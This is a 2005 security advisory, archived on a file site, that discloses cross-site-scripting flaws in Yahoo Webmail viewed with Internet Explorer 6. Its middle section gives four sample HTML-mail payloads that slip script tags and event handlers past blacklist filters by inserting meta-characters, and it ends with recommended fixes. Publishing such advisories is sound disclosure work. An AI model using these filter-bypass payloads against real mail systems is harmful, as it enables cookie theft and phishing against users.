exploit the possibilities

SEC-20051021-0.txt

SEC-20051021-0.txt
Posted Oct 26, 2005
Authored by Bernhard Mueller | Site sec-consult.com

SEC-CONSULT Security Advisory 20051021-0 - Since april 2005 SEC-Consult has found 5+ serious vulnerabilities within Yahoo's webmail systems. All of them have been fixed in the production environment. Nevertheless SEC-Consult believes that input-validation thru blacklists can just be a temporary solution to problems like this. From our point of view there are many other applications vulnerable to this special type of problem where vulnerabilities of clients and servers can be combined.

tags | advisory, vulnerability
MD5 | ceb039ed6e7df89d47b8dcd212ee3071

SEC-20051021-0.txt

Change Mirror Download
SEC-CONSULT Security Advisory 20051021-0
===================================================================================
title: Yahoo/MSIE XSS
program: Yahoo Webmail in combination with MSIE 6.0
(maybe other browsers)
homepage: www.yahoo.com
found: 2005-04
by: SEC-Team / SEC-CONSULT / www.sec-consult.com
===================================================================================

Vulnerabilty overview:
---------------

Since april 2005 SEC-Consult has found 5+ serious vulnerabilities within
Yahoo's webmail systems.
All of them have been fixed in the production environment. Nevertheless
SEC-Consult believes that input-validation thru blacklists can just be a
temporary solution to problems like this. From our point of view there
are many other applications vulnerable to this special type of problem
where vulnerabilities of clients and servers can be combined.

Vulnerabilty details:
---------------

1) XSS / Cookie-Theft

Yahoos blacklists fail to detect script-tags in combination with special
characters like NULL-Bytes and other META-Characters. This leaves
Webmail users using MSIE vulnerable to typical XSS / Relogin-trojan /
Phishing attacks.

2) Some XSS Examples from our advisories

Excerpt from HTML-mails:

================================================================================================
SCRIPT-TAG:
---cut here---
<h1>hello</h1><s[META-Char]cript>alert("i have you
now")</s[META-Char]cript></br>rrrrrrxxxxx<br>
---cut here---
================================================================================================
OBJECT-TAG:
---cut here---
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000">
<param name="movie"
value="http://[somewhere]/yahoo.swf"></obje[META-Char]ct>
---cut here---
================================================================================================
ONERROR-Attribute:
---cut here---
<img src="http://dontexist.info/x.jpg" one[META-Char]rror="alert('i have
you now')">uargg</p>
---cut here---
================================================================================================
ONUNLOAD-Attribute:
---cut here---
</body><body onun[META-Char]load=alert('i have you
now')><br></br><p>somewords</p></body></html>
---cut here---
================================================================================================


Recommended hotfixes for webmail-users
---------------

Do not use MS Internet-Explorer.


Recommended fixes
---------------

Do not use blacklists on tags and attributes. Whitelist
special/meta-characters.


Vendor status:
---------------
Vulnerabilities have been fixed.


General remarks
---------------
We would like to apologize in advance for potential nonconformities
and/or known issues.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC-Team / www.sec-consult.com /
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    15 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close